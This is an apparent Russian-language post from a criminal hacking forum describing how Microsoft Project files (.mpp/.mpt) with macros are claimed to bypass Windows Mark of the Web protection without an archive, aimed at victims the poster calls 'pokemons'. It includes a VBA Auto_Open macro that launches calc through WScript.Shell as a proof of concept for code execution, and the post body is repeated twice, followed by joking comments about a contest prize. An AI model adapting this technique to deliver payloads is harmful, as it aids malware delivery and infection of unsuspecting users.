• XSS.stack #1 – первый литературный журнал от юзеров форума

Видео Обходим мотву без архива (MOTW) 🤣

xrahitel

(L1) cache
Пользователь
Реакции
1 368
Привет всем! Ну, что, давайте начнем ;)

Краткое описание:

Что такое MOTW можно прочитать тут тыц. Microsoft Project Document не входит в состав Microsoft Office по умолчанию, но в этом вижу только плюс, так как мы отсекаем нищебродов. Если на покемоне не установлен Microsoft Project, значит, он просто не сможет открыть данный формат. Вектор для атаки можно посмотреть тут тыц. Microsoft Project Document использует два формата (.mpp и .mpt), оба поддерживают макросы. Ну, и, кроме всего, это, насколько я знаю, единственный формат офиса, который обходит MOTW без архива.
Код:
Sub Auto_Open()
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "calc"
End Sub

Привет всем! Ну, что, давайте начнем ;)

Краткое описание:

Что такое MOTW можно прочитать тут тыц. Microsoft Project Document не входит в состав Microsoft Office по умолчанию, но в этом вижу только плюс, так как мы отсекаем нищебродов. Если на покемоне не установлен Microsoft Project, значит, он просто не сможет открыть данный формат. Вектор для атаки можно посмотреть тут тыц. Microsoft Project Document использует два формата (.mpp и .mpt), оба поддерживают макросы. Ну, и, кроме всего, это, насколько я знаю, единственный формат офиса, который обходит MOTW без архива.
Код:
Sub Auto_Open()
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "calc"
End Sub
школьник обожаю тебя

Совершенно небыло понятно, кто выиграет)...
очевидный договорняк админа с ксрахителем, чтобы выдать ему 3k :D

Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх